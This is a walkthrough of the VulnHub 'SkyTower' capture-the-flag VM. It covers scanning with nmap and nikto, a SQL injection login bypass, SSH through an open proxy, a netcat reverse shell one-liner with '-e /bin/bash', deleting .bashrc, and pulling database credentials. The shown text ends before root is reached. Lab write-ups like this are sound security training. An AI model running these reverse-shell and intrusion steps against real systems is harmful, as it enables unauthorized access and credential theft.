Code name: SkyTower
VM Download: http://download.vulnhub.com/skytower/SkyTower.zip
Challange: Get root on the system
Just after detecting our victim box in the network, we start scanning the box with nmap
# nmap -Pn -p- -A 192.168.11.5
We detected port 80 open, and after browsing to it, we can see a simple login form into it
As always, we can try dig deeper with nikto
# nikto -h http://192.168.11.5
Nothing special found. The next step will be to test the webapp, as it’s written in php, and we supose that there might be a database behind, we can try to find an sql injection.
sqlmap seem to found something interesting
Oh.. that failed, well you know what they say: 60% of the time, it works everytime…
But we can still try to find a way to bypass the login!
Common ways to bypass a php login form are using strings like (‘ # || ” ; ) with boolean expressions that always return true.
Nice, we are in and we got an ssh user:password, lets test it
That did not work, if we remember, as we saw in the nmap scan, ssh port is filtered for some reason.
Time to think out of the box, ssh port is filtered, but the box has got an open proxy running there. We can try to use it with proxychains and see what it happens
We can configure proxychains to use our new proxy by editing /etc/proxychains.conf
Nice, that worked, but.. we are not it?
For some reason the connection gets killed just after our login, but we can solve that with netcat as we still can run commands on the remote box with ssh. We’ll start a netcat listener in our box.
# nc -lvp 8899
Then we’ll run a reverse shell one liner inside the victim box with ssh
# proxychains ssh email@example.com nc 192.168.11.12 8899 -e /bin/bash
Nice, we are in! What to do now? Gather more information, we saw a webapp before, webapps written in php that work with databases use to store users and passwords in plain text inside .php files
And that’s what we got, now we can use this to login into the mysql server and gather more information.
At this point, netcat will not allow us to intercat with the mysql server, we can move to an ssh connection by deleting .bashrc on /home/john/.bashrc and running ssh again (.bashrc contains the code that kills our connection right after the login)
# rm /home/john/.bashrc
Just after doing that, we can get into the mysql server by
$ mysql -u root -p
And using the data we just achieved.
Right after that we can browse into the server for more data
Nice, user:password for more accounts found
We can now try to use these accounts to get into the system, and see if we can do sudo to get root.
And after a few attempts…..